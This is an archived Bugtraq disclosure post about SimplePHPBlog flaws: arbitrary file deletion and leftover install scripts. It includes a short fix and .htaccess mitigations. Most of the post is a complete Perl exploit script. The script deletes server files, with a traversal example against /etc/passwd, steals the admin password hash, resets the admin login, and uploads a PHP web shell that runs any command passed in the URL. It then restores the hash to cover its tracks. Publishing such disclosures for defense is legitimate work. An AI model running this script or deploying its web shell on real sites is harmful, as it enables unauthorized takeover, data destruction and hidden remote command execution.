Bugtraq mailing list archives
SimplePHPBlog Arbitrary File Deletion and Sample Exploit
From: "'ken'@FTU" <ken () ftusecurity com>
Date: Sun, 28 Aug 2005 22:10:07 -0400
SimplePHPBlog has a vulnerability in its comment_delete_cgi.php. The PHP script allows for the arbitrary deletion of files. Attached is an perl script to demonstrate the exploit.This vulnerability, in combination with the fact that the installation scripts are left on the server after installation, allows an arbitrary user to reset the admin password to one of the attacker's choosing.
The script demonstrates the ability to delete files, reset the admin password to the attacker's choosing and upload files (including a command prompt).
The exploit is for educational purposes only. To prevent this exploit change the line in comment_delete_cgi.php from $logged_in = logged_in( false, true ); to $logged_in = logged_in( true, true ); Sincerely, 'ken'@FTU Kenneth F. Belva, CISSP http://www.ftusecurity.com
#!/usr/bin/perl -w #=============================================================================== # Title: sphpblog_vulns.pl # # Written by: Kenneth F. Belva, CISSP # Franklin Technologies Unlimited, Inc. # http://www.ftusecurity.com # # Date: August 25, 2005 # # Version: 0.1 # # Description: This program is for educational purposes only! # SimplePHPBlog as a few vulnerability which this # perl script demonstrates via an exploit. # # Instructions: Should be self-explanatory via the .pl help menu # # Solutions: # *** Solution 1 # Change the line in comment_delete_cgi.php from # $logged_in = logged_in( false, true ); to # $logged_in = logged_in( true, true ); # # *** Solution 2 # Place an .htaccess file with the following config in # the ./config directory: # # # #--------------------- # #Snip .htaccess start # #--------------------- # IndexIgnore * # # <Files .htaccess> # order allow,deny # deny from all # </Files> # # <Files *.txt> # order allow,deny # deny from all # </Files> # #--------------------- # #Snip .htaccess end # #--------------------- # # # *** Solution 3 # See http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0885.html # for PHP modification to upload image script. #=============================================================================== #------------------------------------------------------------------------------- # Global Paramaters #------------------------------------------------------------------------------- use strict; use warnings; use vars qw/ %args /; use Getopt::Std; require LWP::UserAgent; my $ua = LWP::UserAgent->new; #------------------------------------------------------------------------------- # Global Routines #------------------------------------------------------------------------------- #Determine Operating System my $OperatingSystem = $^O; my $unix = ""; #Set OS Parameter if (index(lc($OperatingSystem),"win")!=-1){ $unix="0"; #windows system }else{ $unix="1"; #unix system } #------------------------------------------------------------------------------- # The Main Menu #------------------------------------------------------------------------------- sub menu() { if ($unix){system("clear");} else{system("cls");} print " ________________________________________________________________________________ SimplePHPBlog v0.4.0 Exploits by Kenneth F. Belva, CISSP http://www.ftusecurity.com ________________________________________________________________________________ Program : $0 Version : v0.1 Date : 8/25/2005 Descript: This perl script demonstrates a few flaws in SimplePHPBlog. Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY... DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO NOT HAVE PERMISSION TO DO SO! Please see this script comments for solution/fixes to demonstrated vulnerabilities. http://www.simplephpblog.com Usage : $0 [-h host] [-e exploit] -? : this menu -h : host -e : exploit (1) : Upload cmd.php in [site]/images/ (2) : Retreive Password file (hash) (3) : Set New User Name and Password [NOTE - uppercase switches for exploits] -U : user name -P : password (4) : Delete a System File -F : Path and System File Examples: $0 -h 127.0.0.1 -e 2 $0 -h 127.0.0.1 -e 3 -U l33t -P l33t $0 -h 127.0.0.1 -e 4 -F ./index.php $0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd $0 -h 127.0.0.1 -e 1 "; exit; } #------------------------------------------------------------------------------- # Initial Routine #------------------------------------------------------------------------------- sub init() { use Switch; # colon ':' after letter says that option takes variable my $opt_string = 'e:U:P:h:F:?'; getopts( "$opt_string", \%args ) or menu(); #Load parameters my $exploit = $args{e}; my $host = $args{h}; my $user = $args{U}; my $pass = $args{P}; my $file = $args{F}; # What shall we do today? switch (%args) { case "?" { menu();} case "e" { switch ($exploit) { if ($unix){system("clear");} else{system("cls");} print " ________________________________________________________________________________ SimplePHPBlog v0.4.0 Exploits by Kenneth F. Belva, CISSP http://www.ftusecurity.com ________________________________________________________________________________"; # Upload cmd.php to /images case "1" { print "\nRunning cmd.php Upload Exploit....\n\n"; &UploadCmdPHP($host);} # Retrieve Username & Password hash case "2" { print "\nRunning Username and Password Hash Retrieval Exploit....\n\n"; &RetrievePwd($host."/config/password.txt");} # Replace Username and Password case "3" { print "\nRunning Set New Username and Password Exploit....\n\n"; &SetUserPwd($host,$user,$pass);} # Delete a System File case "4" { print "\nRunning Delete System File Exploit....\n\n"; &DeleteFile($host . "/comment_delete_cgi.php?y=05&m=08&comment=",$file);} } #end $exploit switch print "\n\n\n*** Exploit Completed....\nHave a nice day! :)\n"; } #end "e" case else { menu();} } #end %args switch } #end sub init #------------------------------------------------------------------------------- # Exploit #1: Upload File Via POST #------------------------------------------------------------------------------- sub UploadCmdPHP { my($url) = @_; use LWP; use HTTP::Request::Common qw(POST); my $ua = LWP::UserAgent->new; $HTTP::Request::Common::DYNAMIC_FILE_UPLOAD++; #Step 1: Retrieve hash #----------------------------------------------------------------------- my $hash = &RetrievePwd($url."/config/password.txt"); #Step 2: Delete Existing Password file (SetUserPwd) #Step 3: Create a temporary user id and password (SetUserPwd) #----------------------------------------------------------------------- &SetUserPwd($url,"a","a"); #Step 4: Log into the app and get the PHPSession / my_id session variable #----------------------------------------------------------------------- my $SETcookie = &strip_session(&Login($url . "/login_cgi.php","a","a")); #Step 5: Create and upload our scripts (cmd.php & reset.php) #----------------------------------------------------------------------- &CreateTempPHPs(); # Upload cmd.php my $path = "./cmd.php"; my $file = "cmd.php"; my $req = POST($url."/upload_img_cgi.php", Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie, Content_Type => 'form-data', Content => [userfile => [$path,$file],], ); my $response = $ua->request($req); print "\nCreated cmd.php on target host: " . $url; #$response->is_success or die "Failed to POST '$url': ", $response->status_line; #return $response->as_string; # Upload reset.php $path = "./reset.php"; $file = "reset.php"; $req = POST($url."/upload_img_cgi.php", Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie, Content_Type => 'form-data', Content => [userfile => [$path,$file],], ); $response = $ua->request($req); print "\nCreated reset.php on target host: " . $url; #$response->is_success or die "Failed to POST '$url': ", $response->status_line; #return $response->as_string; #Remove local PHP files &RemoveTempPHPs(); #Step 6: Reset origional Passwpord #----------------------------------------------------------------------- &ResetHash($url."/images/reset.php",$hash); #Step 7: Pass command to delete reset.php (clean up) #----------------------------------------------------------------------- &DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=","./images/reset.php"); print "\nRemoved reset.php from target host: " . $url; print "\n\nTo run command please go to following link: \n\t" . $url."/images/cmd.php?cmd=[your command]"; } #------------------------------------------------------------------------------- # Exploit #2: Retrieve Password File #------------------------------------------------------------------------------- sub RetrievePwd { my($url) = @_; use LWP; use HTTP::Request::Common; my $ua = LWP::UserAgent->new; my $req = GET($url); my $response = $ua->request($req); $response->is_success or die "Failed to POST '$url': ", $response->status_line; my $hash = $response->content; print "\nRetrieved Username and Password Hash: " . $hash; return $hash } #------------------------------------------------------------------------------- # Exploit #3: Set New Username and Password #------------------------------------------------------------------------------- sub SetUserPwd{ my($url,$user,$pass) = @_; &DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=", "./config/password.txt"); &ResetPwd($url . "/install03_cgi.php?blog_language=english",$user,$pass); } #------------------------------------------------------------------------------- # POST to Reset Username and Password (must delete password file first) #------------------------------------------------------------------------------- sub ResetPwd { my($url,$user,$pass) = @_; use LWP; use HTTP::Request::Common; my $ua = LWP::UserAgent->new; my $req = POST($url, [ user => $user, pass => $pass, submit => '%C2%A0Submit%C2%A0' ] ); my $response = $ua->request($req); $response->is_success or die "Failed to POST '$url': ", $response->status_line; print "\n./config/password.txt created!"; print "\nUsername is set to: ".$user; print "\nPassword is set to: ".$pass; } #------------------------------------------------------------------------------- # Exploit #4: Delete Password File #------------------------------------------------------------------------------- sub DeleteFile { my($url,$file) = @_; use LWP; use HTTP::Request::Common; my $ua = LWP::UserAgent->new; my $req = GET($url.$file); my $response = $ua->request($req); $response->is_success or die "Failed to POST '$url': ", $response->status_line; print "\nDeleted File: ".$file; } #------------------------------------------------------------------------------- # log into site #------------------------------------------------------------------------------- sub Login { my($url,$user,$pass) = @_; use LWP; use HTTP::Request::Common; my $ua = LWP::UserAgent->new; my $req = POST($url, [ user => $user, pass => $pass, submit => '%C2%A0Submit%C2%A0' ] ); my $response = $ua->request($req); $response->is_success or die "Failed to POST '$url': ", $response->status_line; print "\nLogged into SimplePHPBlog at: ".$url; print "\nCurrent Username '".$user."' and Password '".$pass."'..."; return $response->header('Set-Cookie'); } #------------------------------------------------------------------------------- # POST the hash #------------------------------------------------------------------------------- sub ResetHash { my($url,$hash) = @_; use LWP; use HTTP::Request::Common; my $ua = LWP::UserAgent->new; my $req = POST($url, [ hash => $hash] ); my $response = $ua->request($req); $response->is_success or die "Failed to POST '$url': ", $response->status_line; print "\nReset Hash at: ".$url; print "\nReset Hash value: ".$hash; } #------------------------------------------------------ # Create Temp PHP files #------------------------------------------------------ sub CreateTempPHPs{ my($hash) = @_; open(PHPFILE, ">./cmd.php"); print PHPFILE &CreateCmdPHP(); close PHPFILE; print "\nCreated cmd.php on your local machine."; open(PHPFILE, ">./reset.php"); print PHPFILE &CreateResetPHP(); close PHPFILE; print "\nCreated reset.php on your local machine."; } #------------------------------------------------------ # Remove Temp PHP files #------------------------------------------------------ sub RemoveTempPHPs{ unlink("./cmd.php"); print "\nRemoved cmd.php from your local machine."; unlink("./reset.php"); print "\nRemoved reset.php from your local machine."; } #------------------------------------------------------ # strip_session - Get PHP Session Variable #------------------------------------------------------ sub strip_session { my($savedata) = @_; my $PHPstring = "PHPSESSID"; my $semi = "\;"; my $datalength = length($savedata); my $PHPstart= (index $savedata, $PHPstring)+10; my $PHPend = index $savedata,$semi,$PHPstart; my $PHPsession= substr $savedata, $PHPstart, ($PHPend-$PHPstart); return $PHPsession; } sub CreateCmdPHP(){ return " <?php \$cmd = \$_GET[\'cmd\']; echo \'<hr/><pre>\'; echo \'Command: \' . \$cmd; echo '</pre><hr/><br>'; echo '<pre>'; \$last_line = system(\$cmd,\$output); echo \'</pre><hr/>\'; ?>. "; # end } sub CreateResetPHP(){ return " <?php \$hash = \$_POST[\'hash\']; \$fp = fopen(\"../config/password.txt\",\"w\"); fwrite(\$fp,\$hash); fpclose(\$fp); ?> "; #end return } #------------------------------------------------------ # Begin Routines #------------------------------------------------------ init();
Current thread:
- SimplePHPBlog Arbitrary File Deletion and Sample Exploit 'ken'@FTU (Sep 01)